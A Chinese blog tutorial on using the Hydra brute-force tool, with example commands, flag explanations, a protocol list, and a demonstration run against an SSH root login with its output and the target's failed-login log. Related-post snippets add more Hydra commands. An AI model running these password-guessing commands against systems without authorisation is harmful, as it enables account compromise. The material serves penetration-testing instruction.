暴力破解工具Hydra 使用

最新推荐文章于 2025-03-21 09:33:34 发布
最新推荐文章于 2025-03-21 09:33:34 发布
阅读量1.9k 收藏 6
点赞数
分类专栏: # 工具 # 渗透测试
本文为博主原创文章,未经博主允许可以转载。
本文链接:https://blog.youkuaiyun.com/helloexp/article/details/118605562
版权
本文介绍了Kali Linux自带的Hydra工具如何用于暴力破解,详细列举了常用命令和参数解释,包括-l、-L、-p、-P等。并展示了针对SSH服务的实战测试,使用top100.txt密码字典对139.x.x.x的目标机器进行攻击。通过`lastb`命令,可以看到暴力破解在目标服务器上的登录尝试记录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali 自带的hydra 工具,直接使用即可,不再赘述安装过程

常用命令如下

  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

其中参数说明

-l        指定要爆破的用户名【常用】
-L              如果用户名很多放在文件中,可以只用这个参数
-p        指定要使用的密码【常用】
-P指定要使用的密码文件
ftp://        指定要爆破的协议,这里使用ftp 协议,其它常用的还有ssh,rdp,mysql、redis等
192.168.0.1指定要爆破的目标机器ip 地址

 

hydra 支持爆破的协议如下

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

实战测试

目标机器:139.x.x.x

目标服务:ssh

密码字典:top100.txt 【字典下载地址:https://download.youkuaiyun.com/download/helloexp/20107342

hydra -l root -P top100.txt ssh://139.x.x.x -t 4 -V -I

运行过程如下

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-09 16:02:14
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 100 login tries (l:1/p:100), ~25 tries per task
[DATA] attacking ssh://139.x.x.x:22
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456789" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "1234567890" - 5 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "woaini1314" - 6 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "qq123456" - 7 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "abc123456" - 8 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456a" - 9 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789a" - 10 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "147258369" - 11 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "zxcvbnm" - 12 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "987654321" - 13 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "12345678910" - 14 of 100 [child 2] (0/0)

 目标服务器上观察下暴力破解的痕迹

[root@hack139 log]# lastb
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)
root     ssh:notty    180.x.x.x   Fri Jul  9 16:03 - 16:03  (00:00)

可以看到hydra 正在一个个尝试字典中的密码

【渗透测试】密码暴力破解工具——九头蛇(hydra使用详解及实战
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
05-05 8万+
【渗透测试】密码暴力破解工具——九头蛇(hydra使用详解及实战
【Kali】中密码暴力破解工具hydra使用
xueshenlaila的博客
03-10 1万+
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具使用,请勿用于非法用途。 hydra参数讲解 -R #继续从上一次进度接着破解。 -S #采用SSL链接。 -s #PORT 可通过这个参数指定非默认端口。 -l #LOGIN 指定破解的用户,对特定用户破解。 -L #FILE 指定用户名字典。 -p #PASS 小写,指定密码破解,少用,一般是采用密
弱口令暴力破解详解(包含工具、字典下载地址)_弱口令字典下载
2401_84215240的博客
06-05 1632
*弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能 对你很了解)猜测到或被破解工具破解的口令均为弱口令,通常与管理的安全意识和平台的初始化配置等相关,通过系统弱口令,可被黑客直接获得系统控制权限。****在常见的安全测试中,弱口令会产生安全的各个领域,包括 Web 应用,安全设备,平台组件,操作系统等;如何获取弱口令,利用弱口令成为了此类安全问题的关键!**
hydra爆破工具
qq_46527080的博客
11-19 1259
https://github.com/vanhauser-thc/thc-hydra 在Linux中下载这个工具,可以进行暴力破解密码 1.使用字典对目标服务进行破解。 hydra -L user.txt -P password.txt ssh://192.168.3.163 2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。 hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40 3.将破解的密码存储到指定文件
暴力破解工具—九头蛇(hydra使用详解及实战
最新发布
bigbangbangbang1的博客
03-21 1422
攻击机:kali装有hydra工具靶机:192.168.154.131安装ssh服务,正常运行。
工具-Hydra暴力破解神器:Hydra-九头蛇
热门推荐
qqchaozai的专栏
11-21 2万+
前言 Hydra[ˈhaɪdrə],九头蛇,希腊神话中的怪兽,在网安工具中,是一款暴力破解的利器! 1 安装使用 Linux下载:https://github.com/vanhauser-thc/thc-hydra Windows下载:https://github.com/maaaaz/thc-hydra-windows 本文采用windows环境演示,下载后,解压,运行【hydra.e...
Hydra密码爆破测试
weixin_43741408的博客
01-19 3546
usr/include/gnu/stubs.h:7:27: 致命错误:gnu/stubs-32.h:没有那个文件或目录。四、利用字典进行远程爆破。二、Crunch安装。
爆破密码-hydra
无痕的博客
02-15 1万+
hydra爆破密码
Hydra暴破工具
2301_78349581的博客
11-10 198
Hydra是一款暴力破解工具,该工具支持几乎所有协议的在线破解,如FTP、HTTPS、MS SQL、Oracle、IMAP、VNC等,同时Hydra字典强大
黑客常用的暴力破解工具hydra使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
Hacker_doggy的博客
07-18 806
Hydra中文名称九头蛇,是著名黑客组织thc的一款开源的暴力密码破解工具,可以爆破多种服务的账号和密码,包括 Web 登录、数据库、SSH、FTP 等服务,支持 Linux、Windows、Mac 平台安装, Kali Linux中自带 Hydra
暴力破解工具-hydra使用
shenshuiwubo123的博客
06-02 2825
一、hydra简介: ydra(九头蛇),分布式任务处理系统,由社交标签服务提供商AddThis六年前开发,现在已得到Apache的开源许可,就像Hadoop一样,只是还没有Hadoop那样的知名度和声势。Hydra的创造者称,该“多头”平台非常擅长处理一些大的数据任务——对非常大的数据集进行实时处理。 hydra 是一款世界顶级密码暴力破解工具,支持几乎所有的协议的在线破解,功能强大,其密码...
Linux下暴力破解工具Hydra使用(文档+PPT)
12-19
Hydra在所有支持GCC的平台能很好的编译这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。其主要破解密码类型有HTTPS、Telnet、FTP、SSH、以POST或GET方式...
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法
暴力破解-hydra-8.1(windows版)
07-17
这个不是一个图形界面的软件,需要在命令行界面执行。 在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在此处打开powershell) ctrl+r 输入cmd 然后进到这个目录也是一样的。 解压即可无需安装。 https://blog.youkuaiyun.com/qq_35311107/article/details/81083981 这是我自己用的心得 赠与新人
WIFI密码破解字典以及大量弱口令字典.txt
08-19
复制别人的,这些密码应该是外国的破解器的字典。不适用中国的
Hydra(海德拉)工具使用从0到1,爆破linux/windows密码
xt350488的博客
06-24 1842
Hydra又叫九头蛇,是一款由著名的黑客组织THC开发的开源暴力破解工具,支持大部分协议的在线密码破解,是网络安全·渗透测试必备的一款工具,目前支持的协议包括在kali系统中自带有hydra九头蛇工具开源地址(下载):https://github.com/vanhauser-thc/thc-hydra
黑客必备工具Hydra的完整安装和使用指南_hydra下载
weixin_51725318的博客
12-07 3634
黑客必备工具Hydra的完整安装和使用指南_hydra下载
Linux下hydra使用
Tobiubiu
07-25 1973
Syntax:  hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] Parameter: -R 继续从上一次进度接着破解 -S 大写,采
kali的hydra工具使用
12-31
### 关于 Kali Linux 中 Hydra 工具使用教程 #### 1. 环境准备 为了能够顺利运行 Hydra 工具,首先需要确保已经成功安装并配置好 Kali Linux。可以从官方网站下载适用于不同平台的镜像文件[^3]。 #### 2. 安装 Hydra 通常情况下,在最新版的 Kali Linux 发行版中,默认已预装了 Hydra 工具。如果没有找到此工具,则可以通过包管理器 apt-get 来安装: ```bash sudo apt update && sudo apt install hydra-gtk ``` 这条命令会更新软件源列表并将 Hydra 和图形界面版本一起安装到系统里。 #### 3. 基本语法结构 Hydra 支持多种协议和服务类型的暴力破解操作,基本命令格式如下所示: ```bash hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [OPTIONS] target and service ``` 其中 `-l` 或者 `-L` 参数用来指定用户名;而 `-p` 或者 `-P` 则是用来提供密码尝试范围;最后部分为目标地址以及所要攻击的服务名称[^4]。 #### 4. 实际案例演示 假设现在有一个 IP 地址为 `192.168.98.136` 的远程服务器开放了 SSH 登录接口,并且拥有一个名为 `admin` 的账户存在于此机器上。此时可以构建如下的测试指令来对该账号实施简单的字典攻击实验: ```bash hydra -l admin -P /path/to/password_list.txt -f 192.168.98.136 ssh -t 1 -v ``` 这里 `/path/to/password_list.txt` 应替换为你实际存储有候选密码集合文本的位置路径;参数 `-t 1` 表示仅开启单线程执行任务以减少网络流量压力;选项 `-v` 开启详细模式输出更多调试信息帮助理解整个过程进展状况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值